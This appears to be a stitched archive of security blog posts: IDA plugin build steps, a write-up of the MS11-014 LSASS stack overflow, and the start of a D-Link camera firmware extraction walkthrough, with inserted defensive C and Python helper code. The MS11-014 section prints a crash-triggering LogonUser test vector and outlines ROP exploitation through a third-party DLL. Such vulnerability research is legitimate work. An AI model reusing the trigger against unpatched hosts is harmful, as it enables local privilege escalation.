<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compiling 64-bit Mac OS X version:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ export __EA64__=1</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ cd ~/idasdk65/plugins/findcrypt2</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ make</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ file ~/idasdk65/bin/plugins/findcrypt.pmc64 </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">~/Users/newsoft/idasdk65/bin/plugins/findcrypt.pmc64: Mach-O dynamically linked shared library i386</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I made both binaries available for download [<a href="http://newsoft.dyndns.org/findcrypt.pmc">32-bit</a>] [<a href="http://newsoft.dyndns.org/findcrypt.pmc64">64-bit</a>].</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Note: IDA64 is actually a 32-bit application that handles 64-bit files - therefore plugins for IDA64 are also expected to be 32-bit libraries. Defining </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">__X64__</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> at compile-time will actually build a full 64-bit library, but that should be useful for building debugger modules only.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Wrapping up</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This documentation is provided under a “worked for me” license.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I might provide limited support for this, but be sure to provide me with very detailed error messages. And please do not ask for “leaked” IDA or IDA SDK versions.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the end, the whole process sounds really awkward. If anybody knows of a better solution to do it, feel free to share!</span></div>
<br />
MS11-014: this is not the bug you are looking for … (published 2012-01-10)<h3>
Intro</h3>
<div align="justify">
One might believe that patch management was an outdated topic in 2011. However, I have still been asked by a client to challenge their internal patch management policy by delivering a working exploit faster than the <i>XX</i>-day period they waited before patch deployment (<i>XX</i> being somewhere between 10 and 99 - I love random figures like this ;).<br />
<br />
This event occurred in February 2011. Having a look at the <a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-feb">gorgeous monthly Microsoft release</a>, we decided to target <a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-014">MS11-014</a> (“<i>Vulnerability in Local Security Authority Subsystem Service Could Allow Local Elevation of Privilege </i>”), since local bugs are usually easier to exploit reliably.<br />
<br /></div>
<div align="justify">
As this story occurred one year ago, I assume that everybody has had enough time to patch. And local exploits are not “wormable”, therefore releasing this information will <i>not</i> result in the end of the Internet.</div>
<h3>
Patch analysis</h3>
<div align="justify">
The patch itself is a <a href="http://autodiff.piotrbania.com/get_diff.php?diff_id=44">piece of cake</a>: only <span style="font-family: 'Courier New';">LSASRV.DLL</span> has changed, and only 2 functions have changed within that DLL.<br />
<br /></div>
<div align="justify">
<span style="font-family: 'Courier New';">FMyPrimitiveHMACParam()</span> only had a few extra NOPs added.<br />
<br /></div>
<div align="justify">
On the other hand, <span style="font-family: 'Courier New';">NegpMapLogonRequest()</span> is an excellent candidate, for an extra size check has been added (as shown below in <b><span style="color: red;">bold red</span></b>) – sorry for providing unformatted <a href="http://www.hex-rays.com/products/decompiler/index.shtml">Hex-Rays</a> pseudo-code, I know it is lame ;)<br />
<br /></div>
<span style="font-family: 'Courier New';">signed int __stdcall NegpMapLogonRequest(char *a1, void *a2, unsigned int a3, struct _MSV1_0_INTERACTIVE_LOGON **a4) </span><span style="font-family: 'Courier New';">{</span><br />
<span style="font-family: 'Courier New';">(…)</span><br />
<span style="font-family: 'Courier New';"> if ( v6 > 0x100u || *(_WORD *)v5 > 0x100u</span><br />
<span style="font-family: 'Courier New';"><strong> <span style="color: red;">|| (v7 = *((_WORD *)a1 + 2), v7 > 0x1FEu)</span></strong> )</span><br />
<span style="font-family: 'Courier New';"> return -1073741562;</span><br />
<span style="font-family: 'Courier New';">(…)</span><br />
<span style="font-family: 'Courier New';">}</span><br />
<span style="font-family: 'Courier New';"><br /></span><br />
<div align="justify">
<span style="font-family: 'Courier New';">a1</span> is not really a <span style="font-family: 'Courier New';">char*</span> but rather a <span style="font-family: 'Courier New';">LSA_UNICODE_STRING</span>, defined as such:<br />
<br /></div>
<span style="font-family: 'Courier New';">typedef struct _LSA_UNICODE_STRING {</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> USHORT Length;</span><br />
<span style="font-family: 'Courier New';"> USHORT MaximumLength;</span><br />
<span style="font-family: 'Courier New';"> PWSTR Buffer;</span><br />
<span style="font-family: 'Courier New';">} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;</span><br />
<span style="font-family: 'Courier New';"><br /></span><br />
<div align="justify">
<span style="font-family: 'Courier New';">NegpMapLogonRequest()</span> has two direct callers: <span style="font-family: 'Courier New';">NegpCloneLogonSession()</span> and <span style="font-family: 'Courier New';">NegpIsLocalOrNetworkService()</span>, which is in turn called from <span style="font-family: 'Courier New';">NegLogonUserEx2()</span>.<br />
<br /></div>
<div align="justify">
Those APIs are internal to LSASS, and are exposed to other processes through <a href="http://recon.cx/2008/a/thomas_garnier/LPC-ALPC-slides.pdf">loosely documented</a> LPC calls. The easiest way to trigger that piece of code from any process is to rely on the official <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa378189(v=vs.85).aspx">LogonUserEx</a> API.</div>
<h3>
Debugging LSASS</h3>
<div align="justify">
Debugging LSASS locally can be tricky, for it is a critical system process that is involved in the debugging subsystem itself. Do not expect to be able to attach <a href="http://ollydbg.de/">OllyDbg</a> and get away with it … The easiest way to do it seems to be relying on the Kernel Debugger itself, which also has the <a href="http://www.nynaeve.net/?p=136">ability to debug any userland process</a>.<br />
<br /></div>
<div align="justify">
That being done, WinDbg confirms that our target function is indeed called indirectly from <span style="font-family: 'Courier New';">LogonUserEx()</span>, and that the offending string is the <i>user-supplied domain name</i> …<br />
<br /></div>
<span style="font-family: 'Courier New';">kd> kv</span><br />
<span style="font-family: 'Courier New';">ChildEBP RetAddr</span><br />
<span style="font-family: 'Courier New';">00acfc8c 757434c5 </span><span style="font-family: 'Courier New';">LSASRV!NegpMapLogonRequest</span><br />
<span style="font-family: 'Courier New';">00acfcb4 75742e41 </span><span style="font-family: 'Courier New';">LSASRV!NegpIsLocalOrNetworkService+0x2f</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';">00acfcf8 75742891 LSASRV!NegLogonUserEx2+0xaa</span><br />
<span style="font-family: 'Courier New';">00acfe98 757422ae LSASRV!LsapAuApiDispatchLogonUser+0x33b</span><br />
<span style="font-family: 'Courier New';">00acfeac 75739481 LSASRV!LpcLsaLogonUser+0x22</span><br />
<span style="font-family: 'Courier New';">00acfec4 757393a5 LSASRV!DispatchAPI+0x46</span><br />
<span style="font-family: 'Courier New';">00acff50 75738cfa </span><span style="font-family: 'Courier New';">LSASRV!LpcHandler+0x153</span><br />
<span style="font-family: 'Courier New';">00acff74 75738dbe LSASRV!SpmPoolThreadBase+0xb9</span><br />
<span style="font-family: 'Courier New';">00acffb4 7c80b729 LSASRV!LsapThreadBase+0x91</span><br />
<span style="font-family: 'Courier New';">00acffec 00000000 kernel32!BaseThreadStart+0x37</span><br />
<div align="justify">
<br />
Wait … does it mean that calling <span style="font-family: 'Courier New';">LogonUserEx()</span> with a domain name over 0x200 characters is enough to trigger that bug? Unfortunately not: <i>because there is no bug</i> … The logon triplet (username, domain, password) will be rejected as invalid – which it is.</div>
<h3>
Where is the meat?</h3>
<div align="justify">
There is still one missing piece in the puzzle: where is the bug? No vulnerable string copy is to be found anywhere within <span style="font-family: 'Courier New';">LSASRV.DLL</span>. And providing an oversized domain name will <i>not</i> result in any crash.<br />
<br /></div>
<div align="justify">
At this point, there are two possible ways to go: one is hard work. The other is <s>laziness</s> efficiency. As <a href="http://pt.linkedin.com/in/jorgemoura">Jorge Moura</a> (from <a href="http://www.primaverabss.com/">Primavera BSS</a>) is credited for the discovery, I emailed him. Not only did he respond over the night, but he also provided me with a test vector. Which turns out to be something like:<br />
<br /></div>
<span style="font-family: 'Courier New';">LogonUser(</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> _T("SomeUsername"),</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> (TCHAR*)domain,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> _T("SomePassword"),</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> LOGON32_LOGON_NEW_CREDENTIALS, // defined as 9</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> LOGON32_PROVIDER_DEFAULT, // defined as 0</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> &hToken </span><span style="font-family: 'Courier New';">);</span><br />
<span style="font-family: 'Courier New';">(…)</span><br />
<span style="font-family: 'Courier New';">ImpersonateLoggedOnUser( hToken );</span><br />
<span style="font-family: 'Courier New';">(…)</span><br />
<span style="font-family: 'Courier New';">CreateFile(</span><br />
<span style="font-family: 'Courier New';"> _T("\\\\127.0.0.1\\c$\\boot.ini"),</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> GENERIC_READ,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> FILE_SHARE_READ|FILE_SHARE_WRITE,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> NULL, // security attributes</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> OPEN_EXISTING,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> FILE_ATTRIBUTE_NORMAL,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> NULL</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';">);</span><br />
<span style="font-family: 'Courier New';"><br /></span><br />
<div align="justify">
The trick is to specify the <span style="font-family: 'Courier New';">LOGON32_LOGON_NEW_CREDENTIALS</span> flag, which has the following effect:<br />
<br /></div>
<div align="justify">
“<i>This logon type allows the caller to clone its current token and specify new credentials for outbound connections. The new logon session has the same local identifier but uses different credentials for other network connections.</i>”<br />
<br /></div>
<div align="justify">
In that case, new credentials are not immediately checked, but rather stored “as is” in memory for future use. And the crash occurs when the authentication package – namely <span style="font-family: 'Courier New';">MSV1_0.DLL</span> – makes use of those new credentials.<br />
<br /></div>
<div align="justify">
The vulnerable function is <span style="font-family: 'Courier New';">SspMapContext()</span>, in which lies an unbounded, inlined <span style="font-family: 'Courier New';">memcpy()</span>. The destination is the local function stack … What else? ;)</div>
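<div align="justify">
The defensive counterpart to the two code paths above, as an added example (my own code, not Microsoft's and not the decompiled <span style="font-family: 'Courier New';">LSASRV</span>/<span style="font-family: 'Courier New';">MSV1_0</span> code): a caller-controlled <span style="font-family: 'Courier New';">LSA_UNICODE_STRING</span> is validated at the entry point against the same 0x1FE-byte bound the patched <span style="font-family: 'Courier New';">NegpMapLogonRequest()</span> enforces, and the later copy into a fixed-size stack buffer is bounded the way a <span style="font-family: 'Courier New';">memcpy_s()</span> replacement would be, so a string that slipped past the entry check still cannot overrun the frame. The struct is a portable stand-in (<span style="font-family: 'Courier New';">uint16_t</span> instead of USHORT/WCHAR) so it compiles outside Windows; <span style="font-family: 'Courier New';">DOMAIN_BUF_UNITS</span>, <span style="font-family: 'Courier New';">map_domain_name()</span> and the constructed all-'A' domain name are assumptions for illustration only.</div>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Portable stand-in for LSA_UNICODE_STRING: Length and MaximumLength are
 * BYTE counts (not characters), Buffer is UTF-16 and need not be
 * NUL-terminated. */
typedef struct {
    uint16_t  Length;
    uint16_t  MaximumLength;
    uint16_t *Buffer;
} lsa_unicode_string_t;

/* Same constant as the extra check added by MS11-014 in NegpMapLogonRequest():
 * 0x1FE bytes, i.e. 255 UTF-16 code units. */
#define DOMAIN_MAX_BYTES 0x1FE

/* Assumed size of the stack buffer the mapping routine copies into:
 * room for DOMAIN_MAX_BYTES plus a terminator (256 code units). */
#define DOMAIN_BUF_UNITS (DOMAIN_MAX_BYTES / 2 + 1)

typedef enum { COPY_OK = 0, COPY_BAD_STRING = -1, COPY_TOO_LONG = -2 } copy_status_t;

/* Entry-point validation: reject the string BEFORE it is stored for later
 * use by an authentication package, not only at the moment of the copy. */
static copy_status_t validate_lsa_string(const lsa_unicode_string_t *s)
{
    if (s == NULL || (s->Buffer == NULL && s->Length != 0))
        return COPY_BAD_STRING;
    if (s->Length % 2 != 0)                 /* UTF-16 needs an even byte count */
        return COPY_BAD_STRING;
    if (s->Length > s->MaximumLength)       /* inconsistent header */
        return COPY_BAD_STRING;
    if (s->Length > DOMAIN_MAX_BYTES)       /* the bound the patch introduced */
        return COPY_TOO_LONG;
    return COPY_OK;
}

/* Bounded copy into a fixed-size destination: what an unbounded inlined
 * memcpy() onto the stack should have been. Returns the number of UTF-16
 * units copied, or a negative copy_status_t. The destination capacity is
 * checked here too, so the copy is safe even if the caller skipped
 * validate_lsa_string(). */
static int copy_lsa_string(uint16_t *dst, size_t dst_units,
                           const lsa_unicode_string_t *src)
{
    copy_status_t st = validate_lsa_string(src);
    if (st != COPY_OK)
        return (int)st;
    size_t units = src->Length / 2u;
    if (units >= dst_units)                 /* keep one unit for the terminator */
        return COPY_TOO_LONG;
    if (units > 0)
        memcpy(dst, src->Buffer, src->Length);
    dst[units] = 0;
    return (int)units;
}

/* Hypothetical stand-in for the domain-name path: builds a constructed
 * domain name of len_units 'A' characters and maps it into a stack buffer
 * of DOMAIN_BUF_UNITS, returning copy_lsa_string()'s result. */
#define MAX_TEST_UNITS 4096
static int map_domain_name(size_t len_units)
{
    uint16_t backing[MAX_TEST_UNITS];
    if (len_units > MAX_TEST_UNITS)
        return COPY_BAD_STRING;
    for (size_t i = 0; i < len_units; i++)
        backing[i] = (uint16_t)'A';

    lsa_unicode_string_t domain = {
        .Length        = (uint16_t)(len_units * 2u),
        .MaximumLength = (uint16_t)(len_units * 2u),
        .Buffer        = backing,
    };
    uint16_t stack_buf[DOMAIN_BUF_UNITS];   /* the frame-local destination */
    return copy_lsa_string(stack_buf, DOMAIN_BUF_UNITS, &domain);
}

int main(void)
{
    /* 255 units (0x1FE bytes) is the largest accepted; 256 is refused. */
    printf("10 units   -> %d\n", map_domain_name(10));
    printf("255 units  -> %d\n", map_domain_name(255));
    printf("256 units  -> %d\n", map_domain_name(256));
    printf("2000 units -> %d\n", map_domain_name(2000));
    return 0;
}
```

The point of keeping two checks is that the original flaw survived precisely because the size was only enforced at one place: the entry check in <span style="font-family: 'Courier New';">LSASRV</span> was patched, while the copy in <span style="font-family: 'Courier New';">MSV1_0</span> stayed unbounded, so any other path delivering the string would still reach the overflow.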
<h3>
Exploitation details</h3>
<div align="justify">
Despite being a “classical”, size-unlimited, Unicode stack overflow, generic exploitation of this bug can be tricky on an up-to-date Windows XP SP3 target.<br />
<br /></div>
<div align="justify">
The LSASS process and all Microsoft-provided DLLs loaded by default within that process benefit from PEB and stack randomization, and are flagged as <a href="http://msdn.microsoft.com/en-us/library/ms235442(v=vs.80).aspx">/NXCOMPAT</a> and <a href="http://msdn.microsoft.com/en-us/library/9a89h429(v=vs.80).aspx">/SAFESEH</a>. The offending function is itself protected by a stack cookie (as a result of the <a href="http://msdn.microsoft.com/en-us/library/8dbf701c(v=vs.80).aspx">/GS</a> option). Exploitation is one-shot, since LSASS process death will notoriously result in a forced system reboot.<br />
<br /></div>
<div align="justify">
During that particular assignment, it turned out that the Symantec (ex-Sygate) personal firewall also loads <span style="font-family: 'Courier New';">SYSFER.DLL</span> (version 1.0.0 at that time – if it means something) into the LSASS address space. As this DLL has been compiled <i>without any security option</i>, and given that Windows XP does not provide any ASLR for code mappings, this DLL has been used as a gadget provider for ROP-like exploitation. After some <a href="http://code.google.com/p/smiasm/">MIASM</a> magic, all client boxes were reliably 0wn3d – thanks to Symantec security products being installed ;)</div>
<h3>
Outro (a.k.a. TL;DR)</h3>
In summary:<br />
<ul>
<li> <div align="justify">
The actual bug has <i>not</i> been fixed. Any other API that allows passing an oversized domain name to LSASS could trigger the very same bug within MSV1_0.</div>
</li>
<li> <div align="justify">
Leave figures to risk managers and top-level management. It makes no sense to define metrics such as “days before public exploit” when unqualified exploit writers can produce a reliable attack vector within 2 days, not to mention all the people who had access to this flaw before its public release. And after one year, this issue is still marked as “no public exploit available” on <a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-feb">Microsoft's summary page</a>.</div>
</li>
<li> <div align="justify">
According to the original discoverer, such a trivial bug (think: <i>oversized domain name provided during user authentication</i>) was found by accident during a software QA session.</div>
</li>
<li> <div align="justify">
According to the Microsoft security bulletin, this bug only affects Windows XP and Windows 2003. It is assumed (without checking) that <a href="http://blogs.msdn.com/b/sdl/archive/2007/04/26/lessons-learned-from-the-animated-cursor-security-bug.aspx">memcpy()</a> was eventually <a href="http://blogs.msdn.com/b/sdl/archive/2009/05/14/please-join-me-in-welcoming-memcpy-to-the-sdl-rogues-gallery.aspx">defined as dangerous</a> and replaced wherever possible by <a href="http://msdn.microsoft.com/en-us/library/wes2t00f(v=vs.80).aspx">memcpy_s()</a>. Is Microsoft aware of the number of security issues that change killed? Who knows …</div>
</li>
</ul>
<br />
D-Link DCS-2121 and the state of embedded security (newsoft, published 2010-09-27)<br />
<br />
<span class="Apple-style-span" style="font-size: x-large;"><b>Introduction</b></span><br />
<br />
I recently bought a <a href="http://www.dlink.com.sg/products/?idproduct=310">D-Link DCS-2121</a> surveillance camera. This is good stuff:<br />
<ul><li>Megapixel camera + microphone + speaker</li>
<li>WiFi, UPnP and dynamic DNS supported</li>
<li>Web and Mobile Web access to streaming data</li>
<li>Motion detection</li>
<li>SDCard recording</li>
</ul>It is also an embedded system running the Linux operating system; therefore I decided to have a look at it ;) A firmware upgrade is available <a href="http://www.dlink.com.sg/support/support_detail.asp?idproduct=310">here</a> (version 1.04 at the time of writing), which is very convenient for further analysis.<br />
<br />
<span class="Apple-style-span" style="font-size: x-large;"><b>Firmware analysis</b></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
$ wget http://www.dlink.com.sg/support/Support_download.asp?idsupport=745<br />
(...)<br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ unzip dcs-2121_fw_1.04_3227.zip<br />
Archive: dcs-2121_fw_1.04_3227.zip<br />
inflating: DCS-2102_DCS-2121_A1_FW_1.04_3227.bin<br />
inflating: DCS-2121_A1_Release Note_forFW1.04-3227.txt<br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ file DCS-2102_DCS-2121_A1_FW_1.04_3227.bin<br />
DCS-2102_DCS-2121_A1_FW_1.04_3227.bin: POSIX shell script text executable</span></span><br />
<br />
Yes, the firmware is … a shell script! In fact, the file is made of two parts:<br />
<ul><li>A shell script</li>
<li>A binary blob</li>
</ul><div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/DCS_firmware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://newsoft.dyndns.org/tech/DCS_firmware.png" /></a></div><br />
The shell script is very small; the interesting parts are the following:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">BLOCKS="norboot.bin(0x10000,65536),vmlinuz(0x60000,1048576),cram_image(0x160000,0x5E0000),autoboot.bin(0x2000,8192)"</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">extract() {</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"># tarLine will be replaced with a real number by Makefile</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">tail -n +153 "$1"</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">}</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">extract "$self" | ddPack - || exit 1</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<br />
"ddPack" is a custom application. Nevertheless, we gained some insight into the memory layout, and we know that a <a href="http://en.wikipedia.org/wiki/Cramfs">CramFS filesystem</a> is used.<br />
<br />
The CramFS "magic" value is 0x28cd3d45; it is very easy to locate within the firmware (beware of endianness). The actual offset may vary depending on the firmware localization (D-Link provides regional builds of the same version).<br />
<br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ dd if=DCS-2102_DCS-2121_A1_FW_1.04_3227.bin of=cramfs bs=1138213 skip=1</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">5+1 records in</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">5+1 records out</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">6168576 bytes (6.2 MB) copied, 0.0210627 s, 293 MB/s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ file cramfs</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">cramfs: Linux Compressed ROM File System data, little endian size 5791744 version #2 sorted_dirs CRC 0x70c14953, edition 0, 3603 blocks, 1199 files</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ sudo mount -o loop,ro cramfs /mnt/loop/</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">ls /mnt/loop/</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">bin dev etc lib linuxrc mnt opt proc sbin scripts tmp usr var</span></span><br />
<br />
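As an added helper (not part of the original post), the "locate the magic, then dd" step above can be automated: the script scans a firmware blob for the CramFS superblock in both byte orders, accepts a hit only when the 16-byte "Compressed ROMFS" signature is present too, and carves exactly the number of bytes the superblock declares. The sample firmware is constructed inline; its header reuses the CRC, block and file counts reported by <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">file</span> above, and the script name in the usage comment is hypothetical.<br />

```python
import struct
import sys

CRAMFS_MAGIC = 0x28CD3D45
CRAMFS_SIGNATURE = b"Compressed ROMFS"
# Superblock flag bits, as defined in the Linux header linux/cramfs_fs.h
CRAMFS_FLAGS = {
    0x00000001: "fsid_version_2",
    0x00000002: "sorted_dirs",
    0x00000100: "holes",
    0x00000200: "wrong_signature",
    0x00000400: "shifted_root_offset",
}
# struct cramfs_super minus the trailing root inode: magic, size, flags,
# future (4 x u32), signature (16 bytes), fsid {crc, edition, blocks, files}
# (4 x u32), name (16 bytes) -> 64 bytes
SUPER_FMT = "4I16s4I16s"
SUPER_LEN = struct.calcsize("<" + SUPER_FMT)


def find_cramfs_images(blob):
    """Return [(offset, info), ...] for every CramFS superblock found in blob.

    Both byte orders are tried, since the magic is stored in the target's
    native order (the camera in the post is little-endian ARM). A hit is
    reported only when the 16-byte signature also matches, which weeds out
    random occurrences of the four magic bytes in code or compressed data.
    """
    hits = []
    for endian in ("<", ">"):
        magic_bytes = struct.pack(endian + "I", CRAMFS_MAGIC)
        pos = blob.find(magic_bytes)
        while pos != -1:
            if pos + SUPER_LEN <= len(blob):
                fields = struct.unpack_from(endian + SUPER_FMT, blob, pos)
                _magic, size, flags, _future, signature = fields[:5]
                crc, edition, blocks, files, _name = fields[5:]
                if signature == CRAMFS_SIGNATURE:
                    hits.append((pos, {
                        "endian": "little" if endian == "<" else "big",
                        "size": size,
                        "flags": [n for bit, n in CRAMFS_FLAGS.items() if flags & bit],
                        "crc": crc,
                        "edition": edition,
                        "blocks": blocks,
                        "files": files,
                    }))
            pos = blob.find(magic_bytes, pos + 1)
    hits.sort(key=lambda h: h[0])
    return hits


def carve_cramfs(blob, offset, size):
    """Cut exactly `size` bytes at `offset`: the dd step, driven by the
    superblock instead of a hand-computed block size."""
    if offset + size > len(blob):
        raise ValueError("superblock claims %d bytes, only %d available"
                         % (size, len(blob) - offset))
    return blob[offset:offset + size]


def make_test_firmware():
    """Constructed sample: a stub installer script, padding standing in for
    the boot loader and kernel blocks, then a fake CramFS image whose header
    carries the same CRC, block and file counts as the real one in the post
    (the payload behind the header is zero-filled, so it is not mountable)."""
    script = b"#!/bin/sh\n# constructed stand-in for the DCS installer script\n"
    padding = b"\x00" * 64
    fs_size = 256
    header = struct.pack("<" + SUPER_FMT,
                         CRAMFS_MAGIC, fs_size, 0x3, 0,   # flags: fsid v2 + sorted dirs
                         CRAMFS_SIGNATURE,
                         0x70C14953, 0, 3603, 1199,       # crc, edition, blocks, files
                         b"Compressed")                    # volume name, NUL-padded
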